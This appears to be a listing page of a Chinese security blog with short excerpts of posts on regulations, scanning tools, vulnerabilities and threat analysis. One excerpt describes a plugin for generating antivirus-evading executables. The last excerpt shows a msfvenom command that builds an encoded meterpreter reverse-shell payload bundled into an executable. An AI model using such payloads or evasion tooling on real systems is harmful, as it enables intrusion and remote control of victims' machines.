桑云信息安云
2021-08-26
8月24日下午3时,国务院新闻办公室举行国务院政策例行吹风会,介绍《关键信息基础设施安全保护条例》(以下简称《条例》)有关情况,并答记者问。 国家互联网信息办公室副主任盛荣华解答,在确立《条例》保护工作总体思路上,主要是把握几点: 一是坚持问题导向。针对关键信息基础设施安全保护工作...
桑云信息安云
2021-08-26
0x01 调整时间格式首先:查看nginx的默认日志的时间格式[root@VM-0-13-centos ~]# more /var/log/nginx/access.log时间格式是:28/Jul/2021:03:36:02 +0800这个格式在写shell脚本的时候,date命令无法识别,所以我们需要更改nginx默认的日期格...
桑云信息安云
2021-08-23
该插件没有什么技术含量,本质上利用的ps2exe.ps1脚本编译为exe,只是不想在命令行里操作,将其写为cna脚本,方便直接快速生成免杀的可执行文件且只有50KB,目前支持exe、ps1文件格式。注:建议在powershell 4.0版本以上机器安装,可向下兼容powershell 2.0。使用方法在导入cna脚本之前,只需要修改当前路径$path为pow...
桑云信息安云
2021-08-21
EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。免责声明本平台集成了大量的互联网公开工具,主要是方便安全人员整理、排查资产、安全测试等,切勿用于非法用途。使用者存在危害网络安全等任何非法行为,后果自负,作者不承担任何法律责任。功能说明功能说明输入目标支持域名、IP段、IP范围。注...
桑云信息安云
2021-08-18
在中间件和审查基础设施中实施 TCP 协议的弱点可以被武器化为一个载体,以对任何目标进行反射拒绝服务 (DoS) 放大攻击,超过了许多现有的基于 UDP 的放大因素。来自马里兰大学和科罗拉多大学博尔德分校的一组学者在 USENIX 安全研讨会上详细介绍了体积攻击利用 TCP 不合规的网络中间件——例如防火墙、入侵防御系统和深度数据包检查 (DPI) 盒 —...
桑云信息安云
2021-08-18
关于 Fortinet 的 Web 应用程序防火墙 (WAF) 设备中一个新的未修补安全漏洞的详细信息已经出现,远程、经过身份验证的攻击者可能会滥用该漏洞在系统上执行恶意命令。“FortiWeb 管理界面(版本 6.3.11 及更早版本)中的操作系统命令注入漏洞可以允许远程、经过身份验证的攻击者通过 SAML 服务器配置页面在系统上执行任意命令,”网络安全公...
桑云信息安云
2021-08-12
情报背景Malwarebytes的研究人员发现有攻击者在近期的攻击活动中使用CVE-2021-26411部署了功能齐全的VBA RAT,本文对其中包含的攻击技术进行了分析研判。战术标签网络钓鱼技术标签Marco情报来源https://blog.malwarebytes.com/threat-intelligence/2021/07/crimea-manife...
桑云信息安云
2021-08-12
0x00 介绍工具介绍Kunyu (坤舆),名字取自 <坤舆万国全图> ,测绘实际上是一个地理信息相关的专业学科,针对海里的、陆地的、天上的地理信息进行盘点。同样应用于网络空间,发现未知、脆弱的资产也是如此,更像是一张网络空间地图,用来全面描述和展示网络空间资产、网络空间各要素及要素之间关系,以及网络空间和现实空间的映射关系。所以我认为“...
桑云信息安云
2021-07-27
具体思路第一步构建恶意文件1.指定一个可执行程序 捆绑木马msfvenom -p windows/x64/meterpreter_reverse_tcp -e x64/zutto_dekiru LHOST=[IP] LPORT=3333 -x webshell.exe ...
蜀ICP备2021014542号-2
